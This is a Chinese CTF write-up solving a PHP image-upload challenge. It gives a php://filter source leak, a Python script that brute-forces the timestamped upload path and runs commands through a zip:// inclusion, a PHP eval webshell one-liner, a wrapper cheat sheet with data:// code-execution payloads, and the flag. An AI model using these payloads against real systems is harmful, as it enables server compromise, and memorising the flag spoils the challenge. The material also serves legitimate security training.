题目内容提示:上传图片试试吧,注意统一时区问题
打开页面如图,源码没有过滤,随便输入,进入上传目录
根据链接可以看到是文件包含,可以利用编码读取源码,这里只列出有用页面的编码(?page=php://filter/read=convert.base64-encode/resource=upload
page=php://filter/read=convert.rot13/resource=upload)
PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiIgPg0KDQo8aGVhZD4NCiAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPg0KICA8dGl0bGU+VXBsb2FkIEZvcm08L3RpdGxlPg0KDQogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9tZXllci1yZXNldC8yLjAvcmVzZXQubWluLmNzcyI+DQoNCiAgPGxpbmsgcmVsPSdzdHlsZXNoZWV0JyBocmVmPSdodHRwczovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9Um9ib3RvOjQwMCwxMDAsMzAwLDUwMCw3MDAsOTAwJz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0naHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PU1vbnRzZXJyYXQ6NDAwLDcwMCc+DQo8bGluayByZWw9J3N0eWxlc2hlZXQnIGhyZWY9J2h0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vZm9udC1hd2Vzb21lLzQuMy4wL2Nzcy9mb250LWF3ZXNvbWUubWluLmNzcyc+DQoNCiAgICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL3N0eWxlLmNzcyI+DQoNCg0KPC9oZWFkPg0KDQo8Ym9keT4NCjw/cGhwDQogICAgJGVycm9yID0gIiI7DQogICAgJGV4dHMgPSBhcnJheSgianBnIiwicG5nIiwiZ2lmIiwianBlZyIpOw0KICAgIGlmKCFlbXB0eSgkX0ZJTEVTWyJpbWFnZSJdKSkNCiAgICB7DQogICAgICAgICR0ZW1wID0gZXhwbG9kZSgiLiIsICRfRklMRVNbImltYWdlIl1bIm5hbWUiXSk7DQogICAgICAgICRleHRlbnNpb24gPSBlbmQoJHRlbXApOw0KICAgICAgICBpZigoQCRfdXBmaWxlU1siaW1hZ2UiXVsic2l6ZSJdIDwgMTAyNDAwKSkNCiAgICAgICAgew0KICAgICAgICAgICAgaWYoaW5fYXJyYXkoJGV4dGVuc2lvbiwkZXh0cykpew0KICAgICAgICAgICAgICAkcGF0aCA9ICJ1cGxvYWRzLyIubWQ1KCR0ZW1wWzBdLnRpbWUoKSkuIi4iLiRleHRlbnNpb247DQogICAgICAgICAgICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJpbWFnZSJdWyJ0bXBfbmFtZSJdLCAkcGF0aCk7DQogICAgICAgICAgICAgICRlcnJvciA9ICLkuIrkvKDmiJDlip8hIjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgZWxzZXsNCiAgICAgICAgICAgICRlcnJvciA9ICLkuIrkvKDlpLHotKXvvIEiOw0KICAgICAgICB9DQoNCiAgICAgICAgfWVsc2V7DQogICAgICAgICAgJGVycm9yID0gIuaWh+S7tui/h+Wkp++8jOS4iuS8oOWksei0pe+8gSI7DQogICAgICAgIH0NCiAgICB9DQoNCj8+DQo8ZGl2IGNsYXNzPSJmb3JtIj4NCiAgPGRpdiBjbGFzcz0idGh1bWJuYWlsIj48aW1nIHNyYz0iaGF0LnN2ZyIvPjwvZGl2Pg0KICA8Zm9ybSBjbGFzcz0ibG9naW4tZm9ybSIgYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+DQogICAgPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImltYWdlIiBwbGFjZWhvbGRlcj0iaW1hZ2UiLz4NCiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCI+bG9naW48L2J1dHRvbj4NCiAgPC9mb3JtPg0KICA8P3BocCBlY2hvICRlcnJvcjs/Pg0KPC9kaXY+DQo8c2NyaXB0IHNyYz0naHR0cDovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9qcXVlcnkvMi4xLjMvanF1ZXJ5Lm1pbi5qcyc+PC9zY3JpcHQ+DQoNCg0KDQo8c2NyaXB0ICBzcmM9ImpzL2luZGV4LmpzIj48L3NjcmlwdD4NCg0KDQoNCg0KPC9ib2R5Pg0KDQo8L2h0bWw+DQo
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="UTF-8">
<title>Upload Form</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto:400,100,300,500,700,900'>
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Montserrat:400,700'>
<link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css'>
<link rel="stylesheet" href="css/style.css">
</head>
<body>
<?php
$error = "";
$exts = array("jpg","png","gif","jpeg");
if(!empty($_FILES["image"]))
{
$temp = explode(".", $_FILES["image"]["name"]);
$extension = end($temp);
if((@$_upfileS["image"]["size"] < 102400))
{
if(in_array($extension,$exts)){
$path = "uploads/".md5($temp[0].time()).".".$extension;
move_uploaded_file($_FILES["image"]["tmp_name"], $path);
$error = "上传成功!";
}
else{
$error = "上传失败!";
}
}else{
$error = "文件过大,上传失败!";
}
}
?>
<div class="form">
<div class="thumbnail"><img src="hat.svg"/></div>
<form class="login-form" action="" method="post" enctype="multipart/form-data">
<input type="file" name="image" placeholder="image"/>
<button type="submit">login</button>
</form>
<?php echo $error;?>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src="js/index.js"></script>
</body>
</html>
根据源码可以看到,上传文件限制了格式、大小、文件名,文件名更是加上时间戳,经过Md5加密,这样就扰乱了我们上传的链接地址。只能通过脚本来实现。
# -*- coding: UTF-8 -*-
import time
import requests
import hashlib
url = "http://ip:80/"
def md5(str):
m = hashlib.md5()
m.update(('shell'+str).encode())
return m.hexdigest()
files = {
"image":("shell.jpg",open("shell.jpg","rb"))#木马文件作为参数
}
t = int(time.time()+28800)#8个时区
requests.post(url=url+"index.php?page=upload",files=files)
for i in range(t-300,t+300):#遍历,找到上传的文件
path = "uploads/"+md5(str(i))+".jpg"
status = requests.get(url=url+path).status_code
if status == 200:
print(path)
break
data = {
#"cmd":"system('ls /');"
"cmd":"system('cat /f11111111_ag');"
}
'''
file:// 访问本地文件系统
http:// 访问 HTTP(s) 网址
ftp:// 访问 FTP(s) URLs
php:// 访问各个输入/输出流(I/O streams)
zlib:// 压缩流
data:// 数据(RFC 2397)
glob:// 查找匹配的文件路径模式
phar:// PHP 归档
ssh2:// Secure Shell 2
rar:// RAR
ogg:// 音频流
expect:// 处理交互式的流
php://filter
读取文件源码
php://filter可获取指定文件源码,如果再利用包含函数漏洞,php://filter流会被当作php文件执行,
一般对其进行编码,使其不被执行,获取到编码后解码,从而达到任意文件的读取
……?file=php://filter/read=convert.base64-encode/resource=文件路径
……?file=php://filter/write=convert.base64-encode/resource=文件路径
data:// 数据流封装器,以传递相应格式的数据,可以用来执行PHP代码
data://text/plain,内容
data://text/plain;base64,base64加密内容
……?file=data://text/plain,<?php%20phpinfo();?>
……?file=data://text/plain;base64,base64加密后内容
压缩文件为协议用法:用于读取压缩文件,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀
phar://[压缩文件路径]/[压缩文件内的子文件名]
zip://[压缩文件绝对路径]%23[压缩文件内的子文件名](%23为#)
compress.bzip2://file.bz2
示例:
1、将php文件添加到压缩文件中(phar)
……?file=phar://D:/……1.zip/1.php
2、将php文件添加到1.zip中,并将1.zip重命名为1.jpg,再上传到目标服务器(zip)
……?file=zip://D:/……1.jpg%231.php
3、压缩1.php为1.bz2(bzip2)
……?file=compress.bzip2://D:/……1.bz2
'''
requrl=url=url+"index.php?page=zip://"+path+"%23shell"
print(requrl)
content = requests.post(url=requrl,data=data).content
#协议里说是绝对路径,但是linux下不可以访问,在本地windows下必须用绝对路径,相对路径不行
#content = requests.post(url=url+"index.php?page=zip:///var/www/html/"+path,data=data).content
print (content)这道题非常难,知识点非常多,文件包含,伪协议,命令执行,木马上传,重点是为协议任意格式文件读取。环节很多,浪费了很长时间。
<?php @eval($_POST['cmd']); ?> 压缩为zip格式文件
flag{3809f2ce999b4d99c8051e285505a014}
